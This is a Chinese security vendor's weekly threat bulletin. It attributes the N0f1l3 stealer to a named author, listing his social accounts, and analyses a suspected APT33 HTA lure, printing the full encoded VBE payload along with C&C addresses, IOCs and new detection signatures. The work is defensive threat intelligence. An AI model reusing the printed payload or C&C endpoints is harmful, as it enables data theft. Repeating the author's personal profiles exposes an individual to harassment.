金睛安全播报 NO.062

本周安全态势

一、本周流行威胁攻击动态

1、窃密木马N0f1l3溯源分析

国外安全厂商近期报道过窃密木马N0f1l3Stealer,我们得到了两个样本。分别基于C#和C++语言,但C&C、URL等字符串完全一样,这引起了我们的兴趣。一般很少有样本使用了两种语言。通过种种线索成功溯源到作者,来自俄罗斯的ims0rry。还发现了他的另外的木马后门。

N0f1l3 Stealer可窃取浏览器的Card、Cookies、Form、Password数据,共支持6款浏览器Chrome、Yandex、Orbitum、Opera、Amigo、Torch、Comodo。

还会窃取各种数字货币,如Bytecoin、Bitcoin、Dash、Electrum、Ethereum、Litecoin、Monero。

N0f1l3 Stealer对桌面上的.txt、.doc、.docx、.log及Filezilla下的sitemanager.xml也有兴趣。

窃取的上述数据会被打包到一个.zip文件里,通过HTTP POST回传给C&C:http://bihelp.top。

C++版本的N0f1l3Stealer

URL格式gate.php?hwid=%s&pwd=%d&cki=%d&cc=%d&frm=%d&wlt=%d

以及 C&C完全相同。

在地下论坛上找到了N0f1l3 Stealer广告,最初v1版本确实是C#语言,v2版本改为了C++。

我们找到了作者的几个网络账号,如推特、github:

https://twitter.com/ims0rry_off

https://github.com/1M50RRY

https://t.me/ims0rryblog

https://ims0rry.tumblr.com/

https://www.facebook.com/alansalbiev/

在github上发现了NoFile-stealer,正是N0f1l3 Stealer。

事实上C#样本的pdb路径是

C:\inetpub\wwwroot\wwwdi09210uudwq\PSOdosa\NoFile\NoFile\obj\Release\NoFile.pdb。

Kuriyama是C#后门,显然也是ims0rry所为,还可以关联到窃密木马Kratos Stealer。

最终找到了facebook的账号

参考:https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html

二、本周高级威胁攻击动态

1、疑似APT33组织最新攻击样本分析

最近我们的高级威胁情报跟踪系统发现了疑似APT33组织的最新攻击样本。

如上,,我们先针对SamerfJobsVacancies.hta这个样本进行分析,该样本在运行之后会将页面指向这个Opendir的samrefjobs.html,该页面展示给受害者的是一个电器项目工程师的职位介绍表,而后,这个hta文件下面含有多段javascriptt代码,并且这个程序制作者非常友好的标记了每段javascript的用途。

除了第一段其余每段javascript代码的思路都一样,通过对数据进行url编码的解码,然后用一串字符串将其切割成代码段和KEY,然后代码段通过与KEY的异或再加上一个值得到最终的解密代码段。

第一段javascript代码主要是调用powershell对数据进行base64解码,解码后的数据如下

这段代码似曾相识,我们之前分析CopyKotty的时候,该组织使用相同的技术,并且可以看到起代码复用性。

我们可以得到C&C为192.119.15.35(Opendir的服务器IP),PORT为448,访问的路径为/QbvL2TRflHjzyvLLqHHbRAgvoGW0z,但是实际在调试的时候发现其实已经不能访问,

第二段主要是下载一个vbe脚本并运行

该vbe代码如下

#@~^Ww8AAA==GaYrKx,+6aVb^kD@#@&f&H~dDDZs2YM~nM^n/k~D/VD;UBwA/4nV^~srm@#@&dOMZhwD.,'~rRrPB,VK^l^P^Wsw;OD@#@&KD1+/k~xPrwKhnDd4VsRa+r@#@&@#@&BP/4mVPbW,nGS+M/tV^~kkP.ExrUTPW~/a+mbWr+9P1Whw;OD~`c~',VG^mVP^Gsw;Y.*@#@&b0,k/hD1d/"EUxbxLckYD;hwDD~h.^+k/*POtnU,@#@&dGr:,W8%ktVs@#@&dj+D~K4%kt^VP8LmY,cEUmMk2Yd4+sVrb@#@&dOd0DEUxrmhN,&1POm/03k^V,&ksP2WS+.d4+V^+X+PJW~[LP6rYE@#@&dG4Ndt^V .!xPOd0D;xBTBK.!+@#@&@#@&@#@&/1DrwDRjs+w,X!Z!@#@&@#@&B,D!x~wGADdtsV,B@#@&@#@&?nO,W8Lk4^V~?O]&1o(jK"`P].;1:qs+qHOD6wk3Ijk^3kRH)]UCCVYl=?3;jM2?:IbUM:r8/DIcyvBG+*,yNF8qGW&6!*f*8&8F+T*ZlXfW*HL$Rbu3z]Tb+zszb.SAm)2tb[oz)3Zb+z$kzfjzH}A;bA/)1}$}b!cz]o~E)oAbn})Obuhz\TAhzMtbHTb8)f&b6pz6)!Ab1S$Lzfozt)b2bGq)r))Sb9pztbz6)!&br})yb!HzeSbazftb5Sby)fTbehz*)9`b}z$kzfHzt)b2bVq)r))Sb9pzepzh)9Ab5}).b93z\5A4zf0bH5b8)M5bepzh)9IbHT)!zMHze}bybG5)})$sb!jz\b~L)!`bHL)2b9jzt5bazM`b15Ab)MIbto~:)9Ib}T$kzfmzH)bSbV2)HL)Sb!jz\bz*)9&b}L)yb9pzHzbzzf&bHTbW)fIbtoz6)!tbH5)FzMqzHLbybGb)H})Sb93zto~k)91b5A)yb95z65bTzMIbHTbZ)M&bHbz6)!Ib15$Vzf5zHLANbVq)r}$^b95zHhzy)!5b1}$0b!jztTbqzMIb1Tb8)M5bepz6)!5b5T$3zM5zt}bZbGq)H})2b!qztb~V)!5bHL)Xb9bz\TbqzM&b5TA4)fTb6pzc)!AbHT)czM2zt}b8bGo)5})Xb9Hztbzc)9tb5}$sb9mzeSb"zM&b5SA4)fIbHoz!)!5b15)*zf2zH)ANbGj)5}$bb!qztb~V)!AbHA)8b95zHzbAzftbHzbW)MIb\ozF)!`b}5)zM2z\}AsbG3)1L)lb9bzHhzy)!&bHL)Sb!jztzb*zMIbr5bS)M`btb~k)95brz)FzM2ztLbHbG3)r))Hb92z\pzc)95br)$Nb9Hz6zAVzMIb}5b8)M&b\p~k)!tb}5$tzfmzt)A4bGj)5A$4b92z\h~k)9Tbr})lb!jzeTbzzfzbrzbZ)M&bHo~V)!`b15$Vzf3zt}bSbVq)H})Hb!pztp~3)95br})Hb!pzHzb+zfAbH5by)fzb\b~t)9Ab55)hzMjz\AblbGH)1)).b!qzHo~3)!tb1}$bb9jzH5bzzfAb15Ab)MIb\hz&)91b5S$kzMpz\AbWbVp)1L)Zb93zHbz&)!&b1L)2b!jzHTb"zM`b}TA0)f0bepz!)91bH5)XzfHz\LblbGH)HL)Xb!2z\p~t)!`b5}$bb!Hzv-Z6g.ADYDrd+1j]+UK]( oP,R3AP`8q*Rc%2#bPb~*#bJ@#@&W(Ld4^VR.;P2hk4VsB!BKD!+@#@&@#@&+s/@#@&7@#@&dUnY,W4Nd4V^P2/AI#k12dtbIUul^T)=j3Z`DA?PIrUVK64kOIv^cvFvc1+9FqF+bV*b"o$Ezs3)hpbO)CSbHT$hbVHzHLbq)Gq)r5)6zM3)ghA%)Go)}z)2b9&b}bbSbG}b\b)6zM()}pby)Mtb5S)abGHz5Ab+)Go)5S)*zfi)\bAr)GH)}z)2b!&b}bbSbG}bIp)hzf3)Ipb.)f0bH5$4bG3zH}bq)Vp)55)hzfe)tobT)VH)55)yb9Ib\bAsbVibtb$LzMi)tob2)f`b}5)abVjz1}Ar)V5)}T$:zfe)\oAr)Gm)1z)Sb!AbtobSbVibtb)*zf()\oby)f5b1z)zbGqzHLb*)G5)}T)6zM\)tpbq)Vq)1T)yb9zbtpbSbGVb\o$kzf^)Ihby)fIbr5)TbV5zHLbT)Vq)1z)6zMe)gpAs)G5)1T$Nb!&b}pA^bGebgh)yzM})gpA0)M`b}T)qbV5z1Lbq)Vp)55)6zM})IoAV)V5)}5)Zb9&btpb2bV(b\b$VzM})tobX)fzbHT)qbVqz5LA4)Go)r5)czM3)tob*)V2)}5)8b9TbIpbXbG\b\b)czf\)IpAs)f1b5S)"bVqz5AA4)G5)1T)!zM})gpbX)G2)1z$Nb9`bIpAbbV(b\b$VzM3)thb8)fIb1z)AbGHzH)b*)V5)HT)FzMi)\pb+)V2)H5$sb90bgoblbG)bgh)yzM()tobS)M`b}z)*bV5zr}bA)Vj)}z$kzf})}bbq)V2)}T)Hb90b}bbHbG3btp)czf})}bAN)ftbrz$VbV5z}}bq)Vq)H5$kzM\)\pA4)Gm)}z$4b9`bIhA4bG3bth$kzfL)}pbl)M`b5T)zbGbzr)bT)Vq)1T$VzMi)gpAs)G3)}5)Sb!&btpbHbV}b\p$3zf})}pbH)M5b1z)+bG2zH}b+)Gb)Hz$tzf3)IpbA)Vj)HS)lb9tbgbb.bV(bgo$3zM\)gpAb)f`b15)zbG2z1}Ar)V5)HS)&zf^)IhAr)Vp)HS)Wb!5bgobZbGVbgb)&zM()gob2)M`b1T)"bVjz}LAV)G3)55)!zf^)tpbz)GH)HT)lb9tbtobXbV3btp$tzMi)IpAb)MtbB-/61j2MYOrRdmiIjK"qUL,POV3,`qFWc%f*#,#P*#*E@#@&dG4N/4s^RD!UP^klBTSKMEP@#@&nU9Pr0@#@&B,s;U1YkGU,YGP14mV,k6Pl,wMGm/dPb/~.!xxbUo@#@&0!U^YbWPr/K.1/dI!UxbxLc(X\Cs,/OD;haY.B4H\l^Ph.mk1C:#@#@&@#@&dGr:,W4N \qU+M\rmnS,/ODq\q5En.H@#@&@#@&i/ODq\&p;DHP',JUnVmOPCPW.K:Pqrx2+'\AppData\Local\Microsoft\Feeds\MSFeeds.vbe

HASH:9881bccf12fd8ae71a03247d2ad61a06

第三段javascript代码主要调用powershell去设置刚刚下载的vbe的脚本的定时任务

第四段主要是获取计算用户信息,网络信息与当前安装的反病毒软件信息,并上传对应的PHP文件。

到这里hta文件告一段落,我们开始分析剩下来的三个ps脚本,剩下的三个PS脚本经过分析之后我们发现他们具备的功能其实一样,猜测可能根据不同的访问端口回传不同的相似的PS脚本并运行,ps脚本里面的命令行基本都经过混淆,基本能躲过杀软的检测。

ps脚本开头解密出C&C服务器地址"https://mypsh.ddns.net:443",

该ps脚本集合数据解密与加密,加密方式为使用RijndaelManaged与KEY进行加密后并使用base64进行编码。

ps脚本会收集用户信息并加密,然后以cookie的方式放到请求头中,然后与C&C服务器通讯。

IOCs:

192[.]119[.]15[.]35

mynetwork[.]ddns[.]net

mypsh[.]ddns[.]net

mynetwork[.]ddns[.]net曾经有个解析IP为140.164.52.7,这个IP的历史解析记录中有三个域名出现在FireEye针对APT33的分析报告中。但是由于这个IP解析记录之间横跨时间有点长,不排除这个IP被其他人攻占利用的情况,因此我们将此次攻击列为疑似APT33的一次最新攻击。

本周升级公告

本周更新事件特征:

1. HTTP_木马_PredatorTheThief_连接

2. HTTP_后门_Final1stspy(Reaper)_连接

3. HTTP_木马_Mitm.iTranslator_连接

4. HTTP_木马后门_CasperTroy(Lazarus)_连接

5. HTTP_异常请求[CVE-2011-1965]

6. HTTP_WEB命令注入攻击

7. TCP_后门_Win32.NanoCore_连接

8. TCP_木马_CoinMiner_尝试连接矿池

  • 发表于:
  • 原文链接:https://kuaibao.qq.com/s/20181111G0S9S500?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

扫码关注云+社区

领取腾讯云代金券